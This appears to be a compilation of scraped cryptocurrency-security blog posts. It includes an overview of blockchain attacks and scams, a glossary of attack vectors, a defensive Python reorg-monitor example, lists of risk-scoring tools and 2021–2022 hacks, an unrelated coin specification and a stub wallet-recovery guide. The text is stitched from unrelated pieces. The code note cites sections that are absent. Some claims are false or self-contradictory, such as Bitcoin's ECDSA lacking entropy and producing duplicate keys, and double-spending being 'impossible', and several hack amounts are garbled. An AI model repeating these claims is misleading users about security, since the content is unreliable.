The distributed nature of the blockchain and the fact that the network requires consensus, and thus eliminates simple attempts at manipulation, also opens the technology up to broader forms of manipulation. One speculated issue with blockchain is a majority problem. For example, with cryptocurrencies, a distributed network of miners is required to keep consensus. To change the “history” of a blockchain, an attacker would need to convince the consensus that their reality was the correct one. Normally, this would be impossible. However, as more and more mining moves to Chinese warehouse farms and away from the distributed hands of people around the world, it becomes easier for a central group to dominate all mining, and thus, the consensus. In other words, one entity with sufficient computing power to throw at the task can take over a network and essentially write reality to be whatever they want it to be.

Called a 51% attack, when an attacker gains a majority control over the nodes in the network, they can control the new reality of the blockchain. While larger blockchains may or may not be at that point, several smaller networks have experienced these attacks already. The proof of concept has been proven, and now it’s a problem that must be solved.

Another attack, known as an “eclipse attack”, involves taking over communications to and from a node. By isolating a node and controlling traffic to it, an attacker can trick that node into wasting time and resources with false data, and thus failing to achieve participation in the blockchain.

The “timejacking” attack is similar. A hacker can theoretically alter the time handling of a node and trick that node into operating on a temporary fork of the blockchain, often using multiple peers that are compromised to use their alternative fork for the attack.

Other attacks involve misdirection.
The “selfish miner” attack was first theorized. It involves strategic timing with mining and adding the mined block to the chain, such that it essentially forks the protocol and forces other miners to waste their time and lose out on the benefits of mining.

A “partition attack” is a kind of attack where attackers segment the network, dividing it into several different partitions that cannot communicate between one another. Selectively blocking traffic essentially forks the blockchain, requiring consensus only within the partition. Similar attacks, called delay attacks, tamper with the speed that nodes can propagate their messages across the network.

One of the most common sorts of attacks is called a double-spending attack. With blockchain-based currencies, the network needs to agree that the request matches its ledger to verify a transaction. Getting all nodes on the network to agree takes time, though, and that lapse in time can be exploited. There are several kinds of double-spending attacks, including Finney attacks, Race attacks, and Vector76.

Denial of Service Attacks

One of the common threats to online businesses and services is the distributed denial of service or DDoS attacks. A DDoS attack involves thousands to millions of machines operating to send data to a server, far more than it can process, bringing it down. This happens hundreds of times every year, to everything from small businesses to major websites.

The distributed nature of the blockchain means it’s less susceptible to these attacks, but botnets can be very, very large, and can be tuned to attack multiple parts of a blockchain network at once. Additionally, numerous instances in the past have shown that even if the blockchain itself isn’t vulnerable, the hubs that use it are; coin exchanges are a popular target for DDoS attacks.
Additionally, many of the more common attacks, such as attacking passwords with dictionary brute-forcing, or phishing and social engineering users for their private information, can work to secure accounts on exchanges and other blockchain-adjacent technologies and platforms.

The very nature of the cryptographic protocol used in the blockchain can leave it vulnerable. Bitcoin is a prime example, using the ECDSA algorithm to generate private keys. Due to the size of the blockchain ledger, it appears that the algorithm used doesn’t have sufficient entropy and can generate the same key more than once. The hashing function used at the core of a blockchain needs to be appropriately complex and entropic to ensure security, and it can be difficult to foresee issues of scale.

On top of all of that, physical attacks can still work as well. One method for storing cryptocurrency “safely” is the Cold Wallet, a wallet storing the data completely segregated from the internet, out of the reach of digital hackers. Someone with the right access to the right facility, though, can simply steal a hard drive and all of the wallets it contains.

Novel Solutions to Novel Problems

Blockchain technology is new and interesting, and as such, thousands of tech startups and hundreds of established companies are working in the space. It’s ripe for innovation and experimentation, but that always opens up room for new attacks. All it takes is forgetting a key element of security along the way to leave a vulnerability open in new technology.

One of the most interesting uses of blockchain technology involves divorcing it from the cryptocurrency aspect of the tech and using the core blockchain protocol in other ways. This has fascinating potential and requires a lot of critical thinking and testing to spot potential security issues in the implementation of new technology.

Many of the problems we have listed up above have solutions, either in theoretical space or in actual implementation.
Consider the problems presented and think about potential solutions. What might you come up with? If the thought exercise interests you, and blockchain technology is something you find fascinating, you might consider pursuing a program to learn the ins and outs of the technology and its security challenges. Our program can certify you as a blockchain developer and prepare you to work in the fast-paced world of emerging technologies.

Whether you’re interested in developing blockchain technology for the next step in its evolution, or you’re more interested in the cat-and-mouse game of hacker versus cybersecurity expert, there’s room for you in the blockchain space. Learn the ins and outs of the technology today, and get started with your contribution to the technology tomorrow.

The most famous cryptocurrency is Bitcoin, but there are many others, such as Ethereum, Litecoin, and Monero. Cryptocurrencies are often bought and sold on decentralized exchanges and can also be used to purchase goods and services.

How Do Cryptocurrencies Work?

Cryptocurrencies use blockchain technology to create a secure, decentralized ledger of all transactions. Blockchain is a distributed database that is secure from hacking because it uses cryptography to encrypt transactions and prevent double-spending. Whenever a transaction is made, it is recorded on the blockchain and verified by a network of computers. This makes it impossible to spend the same cryptocurrency twice fraudulently. It also makes cryptocurrencies much more secure than traditional fiat currencies, which are vulnerable to counterfeiters.

What Are the Cryptocurrency Scams That Affect Cybersecurity?

Since cryptocurrencies are digital and often stored in online wallets, they are vulnerable to hacking. In fact, there have been several high-profile hacks of cryptocurrency exchanges in recent years, resulting in the loss of millions of dollars worth of cryptocurrency. In early May 2021, a ransomware attack struck the Colonial Pipeline.
This attack resulted in the shutdown of the pipeline, which provides much of the fuel for the East Coast of the United States. The hackers demanded a ransom of $5 million in Bitcoin, and they got it. This is just one example of how criminals use cryptocurrency to extort money from victims. Below, we’ve listed the major cryptocurrency scams affecting the cybersecurity of businesses and the security of companies and individuals.

Investment Scams: These scams lure victims with the promise of high returns on their investment in a new cryptocurrency. The reality is that these scammers will take your money and disappear.

Phishing Scams: Phishing is a type of cyber-attack that involves criminals sending fake emails or messages that look like they come from a legitimate source, such as a cryptocurrency exchange. These messages will often contain links that lead to counterfeit websites that steal your login credentials or infect your computer with malware.

Ponzi Schemes: A Ponzi scheme is a type of investment scam that promises high returns but instead uses the money from new investors to pay old investors. These schemes eventually collapse, leaving the new investors with nothing.

Initial Coin Offering (ICO) Fraud: An ICO is a crowdfunding campaign used to raise funds for new cryptocurrencies. However, many ICOs are scams, and the people behind them will take your money and disappear.

Malware: Cryptocurrency mining requires a lot of computing power, which criminals can harness to mine cryptocurrency for themselves. They do this by infecting your computer with malware that allows them to use your resources to mine cryptocurrency. This can slow down your computer and use up a lot of your electricity.

How Does Cryptocurrency Affect the Security of Your Business?

Cryptocurrencies are often used in ransomware attacks, as we saw with the Colonial Pipeline attack. In these attacks, hackers will encrypt your data and demand a ransom in cryptocurrency to decrypt it.
These attacks can be very costly for businesses, as they have to pay the ransom and deal with the downtime caused by the attack. In some cases, companies may not be able to recover their data even after paying the ransom.

Cryptocurrency can also be used to buy and sell illegal goods and services on the dark web. This includes things like drugs, weapons, and child pornography. By using cryptocurrency, criminals can buy and sell these items anonymously without fear of being caught. This makes it very difficult for law enforcement to track down these criminals.

Cryptocurrency can also be used in money laundering schemes. In these schemes, criminals will convert their illicit funds into cryptocurrency and then use it to buy legitimate goods and services, making it difficult to trace the money and track down the criminals.

Overall, cryptocurrency can have a significant impact on the security of your business. If you accept cryptocurrency as payment, you could be targeted by criminals. Additionally, if you use cryptocurrency to buy or sell goods and services, you could unwittingly participate in criminal activity. For these reasons, it’s essential to exercise caution when dealing with cryptocurrency. Make sure you only deal with reputable exchanges and businesses, and be sure to keep your computer security up-to-date to protect yourself from mining malware and other attacks.

What are the measures businesses can take to protect themselves from cryptocurrency scams?

Businesses can take a few measures to protect themselves from cryptocurrency scams.

Educate yourself and your employees about cryptocurrency and how it works. It will help you spot red flags that indicate a scam.

Only deal with reputable exchanges and businesses. Do your research to make sure you’re dealing with a legitimate company.

Keep your computer security up-to-date to protect yourself from mining malware and other attacks.

Be careful when accepting cryptocurrency as payment. Make sure you understand the risks involved before you agree to receive it.

If you use cryptocurrency to buy or sell goods and services, only deal with reputable companies. Be aware of the risks involved in doing this.

You can help protect your business from cryptocurrency scams by taking these measures.

What is the future of cryptocurrency?

The future of cryptocurrency is uncertain, and it remains to be seen whether it will become widely adopted or fade into obscurity. Cryptocurrency has the potential to revolutionize the way we conduct business and interact with each other. However, it also has the potential to be used for criminal activity. Only time will tell what the future of cryptocurrency holds. In the meantime, it’s essential to exercise caution when dealing with it.

Cybercriminals can make money from attacking your organization’s software systems, such as stealing credit card numbers or online banking credentials. However, there are other more sophisticated ways to monetize their actions that aren’t as obvious as stealing money.

Attackers may infect your system with malware that grants remote access to a command and control server. Once they have infected hundreds or even thousands of computers they can establish a botnet, which can be used to send phishing emails, launch other cyber attacks, steal sensitive data, or mine cryptocurrency.

Another common motivation is to gain access to personally identifiable information (PII), healthcare information, and biometrics to commit insurance fraud, credit card fraud or illegally obtain prescription drugs.

Competitors may employ attackers to perform corporate espionage or overload your data centers with a Distributed Denial of Service (DDoS) attack to cause downtime, harm sales, and cause customers to leave your business.

Money is not the only motivator.
Attackers may want to leak information to the public, embarrass certain organizations, grow political ideologies, or perform cyber warfare on behalf of their government like the United States or China.

How Do Attackers Exploit Attack Vectors?

There are many ways to expose, alter, disable, destroy, steal or gain unauthorized access to computer systems, infrastructure, networks, operating systems, and IoT devices. In general, attack vectors can be split into passive or active attacks:

Passive Attack Vector Exploits

Passive attack vector exploits are attempts to gain access or make use of information from the system without affecting system resources, such as typosquatting, phishing, and other social engineering-based attacks.

Active Attack Vector Exploits

Active cyber attack vector exploits are attempts to alter a system or affect its operation such as malware, exploiting unpatched vulnerabilities, email spoofing, man-in-the-middle attacks, domain hijacking, and ransomware.

That said, most attack vectors share similarities:

The attacker identifies a potential target
The attacker gathers information about the target using social engineering, malware, phishing, OPSEC, and automated vulnerability scanning
Attackers use the information to identify possible attack vectors and create or use tools to exploit them
Attackers gain unauthorized access to the system and steal sensitive data or install malicious code
Attackers monitor the computer or network, steal information, or use computing resources.

One often overlooked attack vector is your third and fourth-party vendors and service providers. It doesn’t matter how sophisticated your internal network security and information security policies are — if vendors have access to sensitive data, they are a huge risk to your organization. This is why it is important to measure and mitigate third-party risks and fourth-party risks.
This means it needs to be part of your information security policy and information risk management program. Consider investing in threat intelligence tools that help automate vendor risk management and automatically monitor your vendor’s security posture and notify you if it worsens. Every organization now needs a third-party risk management framework, vendor management policy, and vendor risk management program. Before considering a new vendor, perform a cybersecurity risk assessment to understand what attack vectors you could be introducing to your organization by using them, and ask about their SOC 2 compliance.

What are the Common Types of Attack Vectors?

Compromised Credentials: Usernames and passwords are still the most common type of access credential and continue to be exposed in data leaks, phishing scams, and malware. When lost, stolen, or exposed, credentials give attackers unfettered access. This is why organizations are now investing in tools to continuously monitor for data exposures and leaked credentials. Password managers, two-factor authentication (2FA), multi-factor authentication (MFA), and biometrics can reduce the risk of leaked credentials resulting in a security incident too.

Weak Credentials: Weak passwords and reused passwords mean one data breach can result in many more. Teach your organization how to create a secure password, invest in a password manager or a single sign-on tool, and educate staff on their benefits.

Insider Threats: Disgruntled employees or malicious insiders can expose private information or provide information about company-specific vulnerabilities.

Missing or Poor Encryption: Common data encryption methods like SSL certificates and DNSSEC can prevent man-in-the-middle attacks and protect the confidentiality of data being transmitted. Missing or poor encryption for data at rest can mean that sensitive data or credentials are exposed in the event of a data breach or data leak.
Misconfiguration: Misconfiguration of cloud services, like Google Cloud Platform, Microsoft Azure, or AWS, or using default credentials can lead to data breaches and data leaks. Check your S3 permissions or someone else will. Automate configuration management where possible to prevent configuration drift.

Ransomware: Ransomware is a form of extortion where data is deleted or encrypted unless a ransom is paid, such as WannaCry. Minimize the impact of ransomware attacks by maintaining a defense plan, including keeping your systems patched and backing up important data.

Phishing: Phishing attacks are social engineering attacks where the target is contacted by email, telephone, or text message by someone who is posing as a legitimate colleague or institution to trick them into providing sensitive data, credentials, or personally identifiable information (PII). Fake messages can send users to malicious websites with viruses or malware payloads. Learn the different types of phishing attacks here.

Vulnerabilities: New security vulnerabilities are added to the CVE every day and zero-day vulnerabilities are found just as often. If a developer has not released a patch for a zero-day vulnerability before an attack can exploit it, it can be hard to prevent zero-day attacks.

Brute Force: Brute force attacks are based on trial and error. Attackers may continuously try to gain access to your organization until one attack works. This could be by attacking weak passwords or encryption, phishing emails, or sending infected email attachments containing a type of malware. Read our full post on brute force attacks.

Distributed Denial of Service (DDoS): DDoS attacks are cyber attacks against networked resources like data centers, servers, websites, or web applications and can limit the availability of a computer system. The attacker floods the network resource with messages which cause it to slow down or even crash, making it inaccessible to users.
Potential mitigations include CDNs and proxies.

SQL Injections: SQL stands for Structured Query Language, a programming language used to communicate with databases. Many of the servers that store sensitive data use SQL to manage the data in their database. An SQL injection uses malicious SQL to get the server to expose information it otherwise wouldn’t. This is a huge cyber risk if the database stores customer information, credit card numbers, credentials, or other personally identifiable information (PII).

Trojans: Trojan horses are malware that misleads users by pretending to be a legitimate program and are often spread via infected email attachments or fake malicious software.

Cross-Site Scripting (XSS): XSS attacks involve injecting malicious code into a website but the website itself is not being attacked, rather it aims to impact the website’s visitors. A common way attackers can deploy cross-site scripting attacks is by injecting malicious code into a comment e.g. embedding a link to malicious JavaScript in a blog post’s comment section.

Session Hijacking: When you log into a service, it generally provides your computer with a session key or cookie so you don’t need to log in again. This cookie can be hijacked by an attacker who uses it to gain access to sensitive information.

Man-in-the-Middle Attacks: Public Wi-Fi networks can be exploited to perform man-in-the-middle attacks and intercept traffic that was supposed to go elsewhere, such as when you log into a secure system.

Third and Fourth-Party Vendors: The rise in outsourcing means that your vendors pose a huge cybersecurity risk to your customer’s data and your proprietary data. Some of the biggest data breaches were caused by third parties.

Conclusion

Cryptocurrency can have a significant impact on the security of your business. If you accept cryptocurrency as payment, you could be targeted by criminals.
Additionally, if you use cryptocurrency to buy or sell goods and services, you could unwittingly participate in criminal activity. Businesses can take a few measures to protect themselves from cryptocurrency scams. These include educating yourself and your employees about cryptocurrency, only dealing with reputable firms and exchanges, and keeping your computer security up-to-date.

Though blockchain popularity is still on the rise, an increasing number of cyber attacks on blockchains may negatively affect their reputation. Knowing the most common blockchain vulnerabilities and attack types is a must for everyone who’s concerned about blockchain security and wants to know what to secure first.

GitHub
Telegram: https://t.me/cryptodeeptech
Video: https://youtu.be/7pqVNbcGzls
Source: https://cryptodeeptech.ru/blockchain-attack-vectors
Cryptanalysis
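The selfish-mining and fork-after-withholding sections of the post above both end with a privately mined branch replacing blocks the network had already accepted. The following is an added example, not code from the post or from any project it names: a monitor that an exchange or node operator could use to measure how deep such a reorganization went and which previously confirmed transactions it reversed. The names Block, ReorgMonitor and the sample transactions are hypothetical, and "longest chain" is counted by height, as the post describes it, rather than by cumulative work.

```python
import hashlib
from dataclasses import dataclass
from typing import Dict, List, Optional, Set, Tuple


@dataclass(frozen=True)
class Block:
    prev_hash: str
    txids: Tuple[str, ...]
    miner: str  # constructed label; only keeps sample blocks distinct

    @property
    def hash(self) -> str:
        payload = "|".join((self.prev_hash, ",".join(self.txids), self.miner))
        return hashlib.sha256(payload.encode()).hexdigest()


@dataclass
class Reorg:
    fork_hash: str             # last block shared by the old and new branch
    depth: int                 # blocks dropped from the old best chain
    new_branch_len: int        # blocks adopted in their place
    reverted_txids: Set[str]   # confirmed before, absent from the new branch


class ReorgMonitor:
    """Tracks the best tip by height and reports every branch switch."""

    def __init__(self, genesis: Block):
        self.blocks: Dict[str, Block] = {genesis.hash: genesis}
        self.height: Dict[str, int] = {genesis.hash: 0}
        self.tip = genesis.hash

    def _ancestors(self, h: str) -> List[str]:
        """Hashes from h back to genesis, newest first."""
        out = []
        while h in self.blocks:
            out.append(h)
            h = self.blocks[h].prev_hash
        return out

    def on_block(self, blk: Block) -> Optional[Reorg]:
        if blk.prev_hash not in self.blocks:
            raise ValueError("orphan block: parent unknown")
        h = blk.hash
        self.blocks[h] = blk
        self.height[h] = self.height[blk.prev_hash] + 1
        if self.height[h] <= self.height[self.tip]:
            return None  # side branch is not longer; a tie keeps the first seen
        old_tip, self.tip = self.tip, h
        if blk.prev_hash == old_tip:
            return None  # ordinary extension of the current best chain
        old, new = self._ancestors(old_tip), self._ancestors(h)
        new_set = set(new)
        fork = next(x for x in old if x in new_set)
        dropped = old[: old.index(fork)]
        adopted = new[: new.index(fork)]
        adopted_tx = {t for b in adopted for t in self.blocks[b].txids}
        dropped_tx = {t for b in dropped for t in self.blocks[b].txids}
        return Reorg(fork, len(dropped), len(adopted), dropped_tx - adopted_tx)


def replay_constructed_scenario(alert_depth: int = 2) -> List[Reorg]:
    """Constructed data: two public blocks, then a withheld 3-block branch."""
    genesis = Block("", (), "genesis")
    mon = ReorgMonitor(genesis)
    a1 = Block(genesis.hash, ("deposit-to-exchange", "tx-a"), "honest")
    a2 = Block(a1.hash, ("tx-b",), "honest")
    # Branch built privately on the same parent and released all at once.
    b1 = Block(genesis.hash, ("tx-a", "conflicting-spend"), "withholder")
    b2 = Block(b1.hash, ("tx-b",), "withholder")
    b3 = Block(b2.hash, (), "withholder")
    alerts = []
    for blk in (a1, a2, b1, b2, b3):
        event = mon.on_block(blk)
        if event and event.depth >= alert_depth:
            alerts.append(event)
    return alerts


if __name__ == "__main__":
    for ev in replay_constructed_scenario():
        print(f"reorg depth={ev.depth} reverted={sorted(ev.reverted_txids)}")
```

A deposit that appears in `reverted_txids` is one that must not be credited until it confirms again; the alert depth should be compared with the number of confirmations the operator waits for before releasing funds.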
  20. CRYPTO DEEP TECH

In this article we have compiled a list of useful tools and services for tracking illegal activity and crypto threats and for finding vulnerabilities in blockchain transactions. Most of the services include a comprehensive platform for breach monitoring and process algorithms for crypto wallet security. In cryptanalysis, control and analysis of transactions always matter to us. These services are useful, first, for detecting financial crimes involving crypto wallets; second, for combating money laundering; and third, for countering phishing crypto threats, as well as for eliminating bugs, errors and vulnerabilities.

Crypto risk assessment for individuals:

Januus
A free tool for assessing crypto wallet risk. It helps determine whether a crypto wallet has transacted with an attacker, whether it belongs to a scammer, and whether the wallet address is safe overall. It creates a report on the fraudulent activity of any Ethereum or Bitcoin address based on the relevant identity data and transaction analysis, and displays the audit trail for that report in plain JSON. (Free risk assessment via a public repository on GitHub.) Running it in Google Colab works in any web browser.

GreySafe
GreySafe is a community-driven reporting service for crypto threat actors that accepts submissions from all chains and focuses on verifying them and attributing them accurately.

Etherscan
Etherscan is an Ethereum block explorer and analytics platform that flags bad wallets.

Chainalysis
Chainalysis is a blockchain data platform with a free sanctions API.

PeckShieldAlert
PeckShield is a blockchain security and data analytics company, with a plugin.

Sunrise: NFT Scam Protector
Sunrise.wtf: a plugin for multi-layer protection against NFT scams.

Scam Sniffer
The ScamSniffer browser extension will warn you as soon as it detects a phishing site that poses a threat.

ClankApp
ClankApp: explore the blockchain (ETH, BTC, DOGE) or try the free API Crypto Wales.

Solana Analytics
Solana Analytics: real-time Solana Network statistics updates, including total transactions, TPS performance, total fees, number of blocks produced, number of validators and vote accounts, plus free APIs. www.public-api.solscan.io/docs

Cryptocurrency transaction risk assessment at business scale:

ScoreChain
ScoreChain tracks crypto assets and helps us build a structured and consistent AML strategy for identifying, assessing and managing risk.

TruNarrative
TruNarrative: customer onboarding across multiple jurisdictions, financial crime detection, risk and regulatory compliance.

Elliptic
Elliptic: blockchain analytics and crypto compliance solutions.

SEON
SEON gives us insight into every interaction, order, account, transaction and opportunity.

Civic Pass
Civic Identity tools for web3, identity and age verification. The compliance tools make it easier for liquidity providers, dApp developers and institutional participants to manage risk and build trust.

Global Ledger
Global Ledger: an anti-money-laundering forensics firm that enables banks, fintech and crypto-focused companies to achieve crypto compliance and reduce the business risks associated with money laundering.

Acuant
Acuant will help us instantly reduce risk, prevent fraud and improve security.

Elucidate
Elucidate: a financial crime risk management firm whose blockchain-enabled platform provides a tailored risk management solution.

Validus
Validus: a comprehensive platform combining surveillance, market risk monitoring, algorithm monitoring and AML/transaction monitoring.

Kinectify
Kinectify is anti-money-laundering and compliance software that includes streamlined tools that let us get to know every customer.

Merkle Science BitRank
BitRank automates crypto risk scoring to flag high-risk transactions.

Comply Advantage
Comply Advantage: compliance advantage, simple categorization of risk classes, generation of anti-money-laundering data, a new invention.

MistTracker
MistTrack is an anti-money-laundering tracking system developed by the SlowMist team that uses on-chain analytics to help trace illicit funds.

List of cryptocurrency hacks since January 2021

“At this rate, 2022 will likely surpass 2021 as the biggest year for hacks on record. So far, hackers have made more than $3 billion across 125 hacks,” Chainalysis, October 12, 2022, via Twitter.

The analytics company Chainalysis called October 2022 “the biggest month of the year with the most hacking activity,” with the total value hacked for the month nearly reaching $718 million. Even though no more than half of the month had passed, Chainalysis reported that 11 different hacks of decentralized finance (DeFi) protocols had been exploited for hundreds of millions. Cross-chain bridges are the hackers’ biggest target: three bridges accounted for 82% of the losses in October. According to Chainalysis, the largest of these bridge hacks was an exploit of roughly $100 million in the bridge between the crypto exchange Binance’s BNB Smart Chain and Beacon Chain.
Feb 2021 $45k Cryptopia Troubled NZ Crypto Exchange Cryptopia Suffers Another Hack in the Midst of Liquidation Process
Feb 2021 $37m Alpha Homora Alpha Homora loses $37 million following Iron Bank exploit
Feb 2021 $14m Furucombo Transaction batching protocol Furucombo suffers $14 million ‘evil contract’ hack
Feb 2021 $11m Yearn Finance Hacker Spends $8.3 Million in Fees to Attack Yearn Finance
Mar 2021 $3m PAID Network PAID Network exploiter nets $3 million in infinite mint attack
Mar 2021 $31m Meerkat Finance Dev says $31 million Meerkat Finance exploit was a ‘test’; will return funds
Apr 2021 n/a Hotbit Cryptocurrency Exchange Hotbit Hacked: Systems Paralyzed, 2 Million Users Affected
Apr 2021 $50m Uranium Finance Binance Chain DeFi Exchange Uranium Finance Loses $50M in Exploit
Apr 2021 $80 EasyFi EasyFi Hacked for Over $80 Million in MetaMask Attack
May 2021 $25m xToken xToken DeFi Project Hacked For Over $25M
May 2021 $30m Spartan Protocol Binance Smart Chain’s Spartan Protocol Loses $30M+ in Exploit
May 2021 $200 PancakeBunny PancakeBunny tanks 96% following $200M flash loan exploit
May 2021 $11m bEarn DeFi Protocol bEarn Suffers $11M Flash Loan Attack
May 2021 $22m Value DeFi $22 Million Was Stolen From Three Defi Platforms Last Weekend
Jun 2021 $27m Stablemagnet THE STABLEMAGNET RUGPULL (JUNE 2021)
Jun 2021 $20m Wintermute Wintermute Makes “Optimistic” Assumption
Aug 2021 $80m Liquid Liquid exchange hacked to the tune of $80 million
Aug 2021 $25m Popsicle Finance DeFi Protocol Popsicle Finance Hacked for $25 Million
Sept 2021 $35m Vee Finance Vee Finance Hit for $35M in Second Major Exploit on Avalanche
Oct 2021 $130m Cream Finance Hackers steal $130 million from Cream Finance; the company’s 3rd hack this year
Oct 2021 $68 Compound Bug bites DeFi protocol Compound again
Oct 2021 $16m Indexed Finance Indexed Finance Attacker Refuses to Return Stolen $16M, Team Approaching Authorities
Nov 2021 $55m bZx DeFi Lender bZx Suffers Hack for Reported $55M
Nov 2021 n/a Snowdog OlympusDAO Fork Snowdog Hit By 90% Crash
Dec 2021 $150m Bitmart Crypto exchange BitMart confirms hack resulting in loss of $150 million in crypto
Dec 2021 $78m AscendEx Crypto exchange AscendEX hacked for $78 million in latest swindle
Dec 2021 $120m Badger DAO Badger DAO Protocol Suffers $120M Exploit
Dec 2021 $30m Grim Finance $30 million stolen from Grim Finance, audit firm blames new hire for vulnerability
Dec 2021 $31m MonoX Protocol Detailed analysis of the $31 Million MonoX Protocol Hack
Jan 2022 $6.8m LCX LCX loses $6.8M in a hot wallet compromise over Ethereum blockchain
Jan 2022 $35m Crypto.com Crypto.com Says More Than $35 Million Stolen by Hackers
Jan 2022 $80m Qubit QBridge Qubit pleads with hacker to return $80 million of stolen funds
Feb 2022 $326m Wormhole Blockchain Bridge Wormhole Suffers Possible Exploit Worth Over $326M
Feb 2022 $36m IRA Financial Trust Hackers Snagged $36 Million in Crypto in Breach of IRA Financial
Feb 2022 $13m Superfluid Polygon stablecoin Qi Dao exploited for $13M on Superfluid vested contract
Feb 2022 $10m Project Dego Finance DeFi Project Dego Finance Hacked: Exploiters Reportedly Drain Over $10M
Mar 2022 $52m Cashio A Robin Hood-esque attacker steals $52 million from Cashio, then returns smaller amounts and pledges to donate the rest to charity
Mar 2022 $625m Axie Infinity Axie Infinity’s Ronin Network Suffers $625M Exploit
Mar 2022 $11m Agave Defi Protocols Agave and Hundred Finance Suffer Hack of $11M
Apr 2022 $182m Beanstalk Attacker Drains $182M From Beanstalk Stablecoin Protocol
Apr 2022 $80m Fei Protocol Fei Protocol and Rari Capital Pools Hit By $80 Million Hack
Apr 2022 $11m Elephant Money Hackers steal more than $11 million from Elephant Money DeFi platform
Apr 2022 $16m Deus Dao Deus DAO suffers another flash loan exploit, loses over $16M
May 2022 $10m Saddle Finance Saddle Finance Loses Over $10 Million in Hack — Derev Blog
Jun 2022 $100m Harmony Bridge Harmony’s Horizon Bridge hacked for $100M
Jun 2022 $1.2m Inverse Finance DeFi Protocol Inverse Finance Exploited for $1.2M
Jul 2022 $9m Crema Finance $8.78M stolen in hack of DeFi protocol startup Crema Finance
Aug 2022 $200m Nomad Bridge Nomad crypto bridge loses $200 million in ‘chaotic’ hack
Aug 2022 $611 Poly Network Largest DeFi Hack: $611 Million Stolen from Poly Network
Sept 2022 $8m Vulcan Forged Play-to-Earn Gaming Platform Vulcan Forged Raises $8M in Series A Funding
Sept 2022 $160m Wintermute Crypto Market Maker Wintermute Hacked for $160M, OTC Services Unaffected
Oct 2022 $100m Binance Binance Smart Chain Halts After $100M Crypto Theft!
Oct 2022 $90m Mirror Protocol DeFi Hack Worth $90M Unveiled Seven Months Following The Theft
Oct 2022 $21m Transit Swap Transit Swap loses over $21M due to code bug exploit, issues apology

GitHub
Telegram: https://t.me/cryptodeeptech
Video: https://youtu.be/-s8Z6df_kxY
Source: https://cryptodeep.ru/crypto-risk-scoring
Cryptanalysis
  21. Website | Telegram Ru | Block explorer | Github

Skynet Research coin, or Skyrcoin, is a decentralized open-source cryptocurrency. It is a fork of PIVX/PEONY. Skyrcoin therefore guarantees instant transactions worldwide/POS 3.0/Masternodes. The goal of the project is to create a reliable investment tool for all categories of users. The rate will be pegged to the value of time-tested crypto assets such as Bitcoin and Ethereum, and to the value of shares of promising companies and of metals. Environmental protection, reduction of exhaust gas levels and man-made noise, and the development of resource-saving technologies and new energy sources are priority areas for the development of science and technology.

Specification
Name: Skynet Research
Ticker: SKYR
Total: 10 000 000 000 coins
Premine: 280,000,000 coins
Swap: ~22,500,000 coins
Cryptocurrency type: PoS/Masternodes
Algorithm: X11KVS (peony coin), ~Quark+
Block time: 60 seconds
Reward per block (up to block 100001): 5 coins
Masternode reward: 80%
POS reward: 20%
Mainnet launch: June 25, 2021
Explorer: 45.9.73.207:3001/ or skynresearch.ru
Domain: skynresearch.ru
Website: under development; all information is available in the project's Telegram channel and group.
Number of confirmations for incoming/outgoing transactions (mainnet): 7
Number of confirmations for PoS/MN: 101
Minimum staking age: 1 hour (after block 5000: 600 confirmations / 10 hours).

Reward distribution (20% + 80%) per block
from 251 to 100001: 5 (1 + 4)
from 100001 to 200000: 12
from 200001 to 300000: 25
from 300001 to 400000: 40
from 400001 to 500000: 60
from 500001 to 600000: 50
from 600001 to 700000: 35
from 700001 to 1000000: 25
after 1000001: 0

Masternode collateral, up to block, coins:
up to 100,000: 200000 coins
from 100001 to 200000: 300000 coins
from 200001 to 300000: 500000 coins
from 300001 to 400000: 700000 coins
from 400001: 1000000 coins

Additional information: https://t.me/diplex_swap/44 https://t.me/c/1463447261/137

Whitepaper: The core technologies are described in the PIVX Whitepaper. The financial and economic calculations, the reward distribution table and the masternode collateral growth table are different. https://pivx.org/files/whitepapers/PIVX_Non_Technical_Whitepaper_v2.0.pdf

A snapshot of the Diplex classic (2018) blockchain was taken on July 16, 2021 at block 645383. Coins were sent to the addresses that staked from 2021-06-17 to 2021-07-16 09:09:16. Holders who have diplexcoins in blockchain wallets can apply in the Telegram group.

Giveaways:
Giveaway of 1000 skyr for the first 10 participants, completed;
Giveaway of 1000 skyr for the next 10 participants, active;
Giveaway of 100 skyr for the next 100 participants, active;
Giveaway of 100 skyr for the next 200 participants, planned.
You can post your address in this thread or in the Telegram group.

Telegram group (Skynet Research coin): https://t.me/Skynet_Research_coin
Telegram channel (Diplex swap (X13) to Skynet Research): https://t.me/diplex_swap
Source code: https://github.com/DiplexSoftfork/Skyrcoin
Github: https://github.com/DiplexSoftfork/Skyrcoin
Qt wallet, Linux x64, Windows x64 only: https://github.com/DiplexSoftfork/Skyrcoin/releases

On January 31, 2022 the swap and relaunch of the project took place.

Specification v 2.0.0.8/2022
Name: Skynet Research
Ticker: SKYR
Algorithm: Quark
Maximum number of coins: 10 billion
Premine: 15 million (the amount remaining after the swap will be locked)
Mining type: PoS+Masternode
Block reward: up to 5001, 5 coins; after 5000, 1+4
Masternode collateral: 400000 (from block 1 to block 800001)
Masternode reward: 80%
PoS (wallet) reward: 20%
Developer fee: 0%
Block time: 60 sec
Number of confirmations for an input to mature: 101
PoS activation:
- on mainnet at block 251
- on testnet at block 201
- on regtest at block 251
Number of confirmations for incoming/outgoing transactions:
- on mainnet 7
- on testnet 3
- on regtest 3
Number of confirmations for pow/pos transactions:
- on mainnet 101
- on testnet 16
- on regtest 101

Reward distribution (20%+80%) by block
up to 100001: 5 (1+4)
from 100001 to 200000: 4
from 200001 to 300000: 3
from 300001 to 400000: 2
from 400001 to 500000: 2
from 500001 to 600000: 1
from 600001 to 700000: 0.5
from 700001 to 800000: 0.5
from 800001: 0.5

Masternode collateral, by block
from 1 to 800000: 400000 skyr
  22. CRYPTO DEEP TECH

Open-source tools for recovering a wallet password and seed phrase in the Crypto Deep Tools repository.

Many people in the crypto community run into a situation where you have accidentally lost or forgotten part of your mnemonic or made a mistake when sending BTC coins. (As a result, you either see an empty wallet or get an error message that your wallet seed phrase is invalid.) BTCRecover is an open-source wallet password and seed phrase recovery tool.

Let's move on to the experimental part:
Open [TerminalGoogleColab].
We will use the «17BTCRecoverCryptoGuide» repository.
Installation commands:
Install all the required packages, modules and libraries
Using the lscpu command to find out the CPU architecture of Google Colab
Installing PyOpenCL for Linux
Testing your system
Basic Bitcoin recovery

GitHub
Telegram: https://t.me/cryptodeeptech
Video: https://youtu.be/imTXE4rGqHw
Source: https://cryptodeep.ru/btc-recover-crypto-guide
Cryptanalysis
